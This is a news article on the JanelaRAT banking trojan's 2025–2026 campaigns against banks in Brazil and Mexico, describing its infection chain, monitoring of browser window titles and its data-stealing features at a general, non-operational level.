14.04.2026
3 min
147
Banks and financial institutions in Latin America have been hit by a new wave of attacks by JanelaRAT malware, which is actively used to steal financial data and track victims. In 2025, more than 14,700 attacks were recorded in Brazil alone.
Financial firms across Latin America are under attack once again. Banks in Brazil and Mexico (and other) have been hit with yet another wave of infections stemming from the JanelaRAT malware. This particular piece of malware has a proven track record of targeting money and people’s ability to access their accounts.
JanelaRAT is not new. It is an updated version of BX RAT. However, unlike its predecessor, JanelaRAT has become much more aggressive. Unlike previous versions of malware, JanelaRAT doesn’t merely steal your login credentials or password. Instead, JanelaRAT “lives” within your system; it waits until you make a move, then it tracks every single movement you make. Your mouse movements will be tracked; every keystroke will be captured; screenshots will be taken; and while it’s watching you, it will gather important data about your system. Of course, JanelaRAT is particularly interested in anything related to banking and cryptocurrency.
Researchers say that JanelaRAT has an interesting way of doing things. While most malware simply sits back and waits for the victim to take action, JanelaRAT continuously checks the website being viewed by the victim.
“According to researchers, one of the key differences between JanelaRAT and other malware variants is how they detect the title bar of a browser tab in order to determine which site the user is viewing in their browser and then execute malicious actions.”
Simply stated, if the victim accesses a financial website, JanelaRAT “wakes-up,” and becomes active. Simultaneously, the attacks are constantly evolving — hackers continually update both the malware and method of distribution.
When looking at the number of attacks, the picture appears to be alarming. According to Brazilian researchers, over 14,000 attacks occurred in Brazil alone in 2025. Over 11,700 attacks occurred in Mexico during the same year. These are the only figures we know about — however, we have absolutely no idea how many successful breaches actually occurred.
Historically speaking, the strategy employed by hackers has always followed a relatively simple methodology. A user would receive a zip-file containing vbscript, which would pull down the second file along with a dll file. At the conclusion of this sequence, the Trojan would be executed via dll-side loading so that it could appear as though it was running as a legitimate program.
However, in recent times, everything seems to be slightly more complex. New campaigns employ msi-installers as opposed to traditional zip-files. Msi-installers do not draw suspicion because they appear as typical software applications; in addition to running on standard services (such as gitlab), they are often disguised as normal applications.
Once an msi-installer has been launched, a series of events begin. go, powershell, and batch scripts begin to extract the contents of the archive — including the trojan itself — as well as any additional files required. In some cases, a separate browser extension will be installed (kpmg reported this occurrence).
What occurs afterwards is perhaps even more intriguing. The system identifies the user’s browsers and attaches the aforementioned extension quietly. From here onward, everything is collected. Cookies, browsing history, tabs, and plug-ins are all harvested — in addition to this, the extension is capable of responding based upon the sites accessed by the user.
Attacks typically occur rather normally. A user receives a notification stating her account needs attention. She clicks on the link provided; she downloads a pdf document — and, unbeknownst to her, she launches a zip-file that contains a complete infection.
For nearly all of 2024, hackers have shifted their focus toward msi-based distributions. They serve multiple purposes: they function as dropper tools — and as autorun tools in Windows.
Upon execution, janelarat connects to a server and begins monitoring activity. Its primary objective is to monitor each time the victim logs into a banking or financial application/website. When the victim logs into a banking application/website, janelarat monitors activity and checks for the name of the window. After approximately 2-3 seconds, if the names match — janelarat executes the proper actions.
At best, janelarat has a very wide range of functions. Some include:
Screenshots
Extracting portions of screens
Simulating “update windows” or displaying mockup banking pages/forms
Recording keystrokes
Moving cursor and simulating mouse-clicks
Executing powershell commands
Hiding its operations
Checking for anti-fraud detection
One final note: The malware will check whether someone is utilizing the computer. If someone hasn’t utilized the computer for greater than 10 minutes — it notifies its server. Once someone utilizes the computer again — it sends a message to its server indicating that it’s okay to proceed. Therefore, hackers essentially see when they should be able to remain calm.
